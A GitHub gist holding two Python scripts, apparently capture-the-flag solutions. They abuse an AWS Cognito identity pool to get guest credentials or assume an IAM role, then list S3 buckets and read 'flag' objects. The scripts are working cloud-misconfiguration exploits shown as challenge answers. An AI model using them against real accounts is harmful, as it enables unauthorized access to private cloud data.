Last active
June 14, 2023 17:37
-
-
Save fionn/d265c07593fbe259eb1d840519861d80 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import boto3 # type: ignore | |
import requests # type: ignore | |
REGION = "us-east-1" | |
IDENTITY_POOL_ID = REGION + ":b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" | |
def main() -> None: | |
"""Entry point""" | |
client = boto3.client("cognito-identity", REGION) | |
identity_id = client.get_id(IdentityPoolId=IDENTITY_POOL_ID)["IdentityId"] | |
credentials = client.get_credentials_for_identity(IdentityId=identity_id)["Credentials"] | |
# pylint: disable=invalid-name | |
s3 = boto3.client("s3", | |
aws_access_key_id=credentials["AccessKeyId"], | |
aws_secret_access_key=credentials["SecretKey"], | |
aws_session_token=credentials["SessionToken"], | |
region_name=REGION) | |
bucket="wiz-privatefiles" | |
objects = s3.list_objects(Bucket=bucket)["Contents"] | |
flag_key = [blob for blob in objects if blob["Key"][:4] == "flag"].pop()["Key"] | |
payload = {"Bucket": bucket, | |
"Key": flag_key} | |
presigned_url = s3.generate_presigned_url("get_object", payload) | |
response = requests.get(presigned_url) | |
response.raise_for_status() | |
print(response.text) | |
if __name__ == "__main__": | |
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import boto3 # type: ignore | |
from botocore.exceptions import ClientError # type: ignore | |
REGION = "us-east-1" | |
IDENTITY_POOL_ID = REGION + ":b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" | |
ROLE_NAME = "Cognito_s3accessAuth_Role" | |
ROLE_ARN = "arn:aws:iam::092297851374:role/" + ROLE_NAME | |
def main() -> None: | |
"""Entry point""" | |
cognito = boto3.client("cognito-identity", REGION) | |
identity_id = cognito.get_id(IdentityPoolId=IDENTITY_POOL_ID)["IdentityId"] | |
token = cognito.get_open_id_token(IdentityId=identity_id)["Token"] | |
sts = boto3.client("sts") | |
assume_role = sts.assume_role_with_web_identity(RoleArn=ROLE_ARN, | |
RoleSessionName="yolo", | |
WebIdentityToken=token) | |
credentials = assume_role["Credentials"] | |
session = boto3.Session(aws_access_key_id=credentials["AccessKeyId"], | |
aws_secret_access_key=credentials["SecretAccessKey"], | |
aws_session_token=credentials["SessionToken"], | |
region_name=REGION) | |
# pylint: disable=invalid-name | |
s3 = session.client("s3") | |
buckets = [bucket["Name"] for bucket in s3.list_buckets()["Buckets"]] | |
for bucket in buckets: | |
try: | |
blobs = s3.list_objects(Bucket=bucket)["Contents"] | |
blobs = [blob["Key"] for blob in blobs] | |
flag_path = [blob for blob in blobs if "flag" in blob].pop() | |
flag_blob = s3.get_object(Bucket=bucket, Key=flag_path)["Body"] | |
print(f"{bucket}:", flag_blob.read().decode().strip()) | |
except ClientError: | |
pass | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment